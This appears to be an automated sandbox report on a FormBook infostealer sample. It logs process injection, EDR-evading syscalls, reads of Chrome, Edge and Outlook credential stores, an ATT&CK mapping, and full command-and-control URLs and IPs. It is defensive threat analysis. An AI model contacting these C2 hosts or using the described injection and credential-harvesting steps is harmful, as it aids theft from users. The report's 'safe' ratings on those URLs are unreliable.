                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\powercfg.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: NULL target: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: NULL target: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\powercfg.exeThread register set: target process: 7840Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\powercfg.exeThread APC queued: target process: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2480008Jump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006A87B1 LogonUserW,0_2_006A87B1
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00653B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00653B3A
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_006548D7
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006B4C7F mouse_event,0_2_006B4C7F
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\wWXR5js3k2.exe"Jump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeProcess created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006A7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006A7CAF
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006A874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006A874B
                Source: wWXR5js3k2.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: ycBMGRFRlht.exe, 00000004.00000000.1810745182.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2613115298.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613058661.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: wWXR5js3k2.exe, ycBMGRFRlht.exe, 00000004.00000000.1810745182.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2613115298.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613058661.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ycBMGRFRlht.exe, 00000004.00000000.1810745182.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2613115298.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613058661.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ycBMGRFRlht.exe, 00000004.00000000.1810745182.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2613115298.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613058661.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0067862B cpuid 0_2_0067862B
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00684E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00684E87
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00691E06 GetUserNameW,0_2_00691E06
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00683F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00683F3A
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006549A0
                Source: wWXR5js3k2.exe, 00000000.00000003.1358395699.0000000000E85000.00000004.00000020.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000002.1378876091.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1359604715.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1361383455.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1360817764.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1360684874.0000000000EA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2613375030.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2613433985.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2613432274.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1886277798.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1887212251.0000000004E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2610818121.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2615837301.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1886979901.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\powercfg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: wWXR5js3k2.exeBinary or memory string: WIN_81
                Source: wWXR5js3k2.exeBinary or memory string: WIN_XP
                Source: wWXR5js3k2.exeBinary or memory string: WIN_XPe
                Source: wWXR5js3k2.exeBinary or memory string: WIN_VISTA
                Source: wWXR5js3k2.exeBinary or memory string: WIN_7
                Source: wWXR5js3k2.exeBinary or memory string: WIN_8
                Source: wWXR5js3k2.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2613375030.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2613433985.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2613432274.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1886277798.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1887212251.0000000004E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2610818121.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2615837301.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1886979901.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006C6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_006C6283
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006C6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_006C6747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets161
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587987 Sample: wWXR5js3k2.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.oneeyetrousersnake.xyz 2->28 30 www.wine-drinkers.club 2->30 32 6 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 4 other signatures 2->50 10 wWXR5js3k2.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 ycBMGRFRlht.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 powercfg.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 ycBMGRFRlht.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 oneeyetrousersnake.xyz 63.250.43.134, 64527, 64528, 80 NAMECHEAP-NETUS United States 22->34 36 www.wine-drinkers.club 194.245.148.189, 64523, 64524, 64525 CSLDE Germany 22->36 38 3 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                wWXR5js3k2.exe65%VirustotalBrowse
                wWXR5js3k2.exe74%ReversingLabsWin32.Trojan.Strab
                wWXR5js3k2.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.supernutra01.online/rk61/?rdmhfXe=4Jev6jkxg6xEO7DVmJ20iETfs2t7f6dacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9IEZesAjm/l1NEB+do2leeTcUFeI7Uw==&AF=At8pGDY0Z0%Avira URL Cloudsafe
                http://www.wine-drinkers.club/hakt/?rdmhfXe=Z3UZ9pkvUTN8eySircCOaDAcK9AA6JZfB0YdpGFssPaitvOOGMcOB1EIrUeEo9sxw4W4nK9e2r79OuzvY2TkP9tUb4eHWat+jQL942ZrdRgvNUE9NQ==&AF=At8pGDY0Z0%Avira URL Cloudsafe
                https://kb.fastpanel.direct/troubleshoot/0%Avira URL Cloudsafe
                http://www.supernutra01.online/rk61/0%Avira URL Cloudsafe
                http://www.oneeyetrousersnake.xyz/4inx/0%Avira URL Cloudsafe
                http://www.1secondlending.one/6pwo/0%Avira URL Cloudsafe
                http://www.oneeyetrousersnake.xyz0%Avira URL Cloudsafe
                http://www.wine-drinkers.club/hakt/0%Avira URL Cloudsafe
                http://www.1secondlending.one/6pwo/?rdmhfXe=OcYLCa3XOMtt+Rsv8j1JEBYyKSs2FBnaDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abiRcuJlWrvFsYiciiVw8Ks4AYAtrm9w==&AF=At8pGDY0Z0%Avira URL Cloudsafe
                http://www.qqa79.top/mz0w/?rdmhfXe=uMzU0JGK22aEYJLCyAIreKcU1rJUCkGv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wwp4pfrJHMjCh6luBqHWNFeR0cmEvsKw==&AF=At8pGDY0Z0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                qqa79.top
                		38.47.233.21
                		truefalse
                  		unknown
                  oneeyetrousersnake.xyz
                  		63.250.43.134
                  		truetrue
                    		unknown
                    www.supernutra01.online
                    		188.114.97.3
                    		truefalse
                      		high
                      www.1secondlending.one
                      		43.205.198.29
                      		truefalse
                        		high
                        www.wine-drinkers.club
                        		194.245.148.189
                        		truetrue
                          		unknown
                          www.qqa79.top
                          		unknown
                          		unknownfalse
                            		unknown
                            www.oneeyetrousersnake.xyz
                            		unknown
                            		unknowntrue
                              		unknown
                              171.39.242.20.in-addr.arpa
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.supernutra01.online/rk61/?rdmhfXe=4Jev6jkxg6xEO7DVmJ20iETfs2t7f6dacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9IEZesAjm/l1NEB+do2leeTcUFeI7Uw==&AF=At8pGDY0Ztrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.qqa79.top/mz0w/?rdmhfXe=uMzU0JGK22aEYJLCyAIreKcU1rJUCkGv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wwp4pfrJHMjCh6luBqHWNFeR0cmEvsKw==&AF=At8pGDY0Zfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.oneeyetrousersnake.xyz/4inx/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.wine-drinkers.club/hakt/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.supernutra01.online/rk61/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.1secondlending.one/6pwo/?rdmhfXe=OcYLCa3XOMtt+Rsv8j1JEBYyKSs2FBnaDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abiRcuJlWrvFsYiciiVw8Ks4AYAtrm9w==&AF=At8pGDY0Ztrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.wine-drinkers.club/hakt/?rdmhfXe=Z3UZ9pkvUTN8eySircCOaDAcK9AA6JZfB0YdpGFssPaitvOOGMcOB1EIrUeEo9sxw4W4nK9e2r79OuzvY2TkP9tUb4eHWat+jQL942ZrdRgvNUE9NQ==&AF=At8pGDY0Ztrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.1secondlending.one/6pwo/true
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ac.ecosia.org/autocomplete?q=powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtabpowercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://joker.com/?pk_campaign=Parking&pk_kwd=textpowercfg.exe, 00000005.00000002.2614313409.000000000417A000.00000004.10000000.00040000.00000000.sdmp, powercfg.exe, 00000005.00000002.2616328430.00000000062F0000.00000004.00000800.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613874662.0000000003ABA000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://kb.fastpanel.direct/troubleshoot/powercfg.exe, 00000005.00000002.2616328430.00000000062F0000.00000004.00000800.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2614313409.0000000003FE8000.00000004.10000000.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613874662.0000000003928000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpowercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.oneeyetrousersnake.xyzycBMGRFRlht.exe, 00000008.00000002.2615837301.000000000570B000.00000040.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.ecosia.org/newtab/powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=powercfg.exe, 00000005.00000002.2616496531.0000000007D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  38.47.233.21
                                                  		qqa79.topUnited States
                                                  		174COGENT-174USfalse
                                                  188.114.97.3
                                                  		www.supernutra01.onlineEuropean Union
                                                  		13335CLOUDFLARENETUSfalse
                                                  43.205.198.29
                                                  		www.1secondlending.oneJapan4249LILLY-ASUSfalse
                                                  194.245.148.189
                                                  		www.wine-drinkers.clubGermany
                                                  		5517CSLDEtrue
                                                  63.250.43.134
                                                  		oneeyetrousersnake.xyzUnited States
                                                  		22612NAMECHEAP-NETUStrue

                                                  General Information

                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1587987
                                                  Start date and time:2025-01-10 20:08:50 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 8m 42s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:10
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:2
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:wWXR5js3k2.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:919e47baabe9cc5fe28aa098991efc624b4cfe2c4008ce036a35b49edc438a4d.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@7/5@6/5
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HCA Information:
                                                  • Successful, ratio: 97%
                                                  • Number of executed functions: 58
                                                  • Number of non-executed functions: 284
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53, 20.242.39.171, 4.175.87.197
                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target ycBMGRFRlht.exe, PID 3688 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  14:11:12API Interceptor451302x Sleep call for process: powercfg.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  38.47.233.21Recibos.exeGet hashmaliciousFormBookBrowse
                                                  • www.qqa79.top/dp98/
                                                  CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                  • www.qqa79.top/dp98/
                                                  188.114.97.3NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                  • www.vh5g.sbs/rjsl/
                                                  KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                  • www.beylikduzu616161.xyz/2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy
                                                  GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                                  • /api/get/dll
                                                  DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                  • www.uzshou.world/ricr/
                                                  Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                  • www.cifasnc.info/8rr3/
                                                  Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                  Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                  • www.cifasnc.info/8rr3/
                                                  dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                  • /api/get/free
                                                  dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                  • /api/get/free
                                                  RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                  • www.rgenerousrs.store/o362/
                                                  43.205.198.29Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
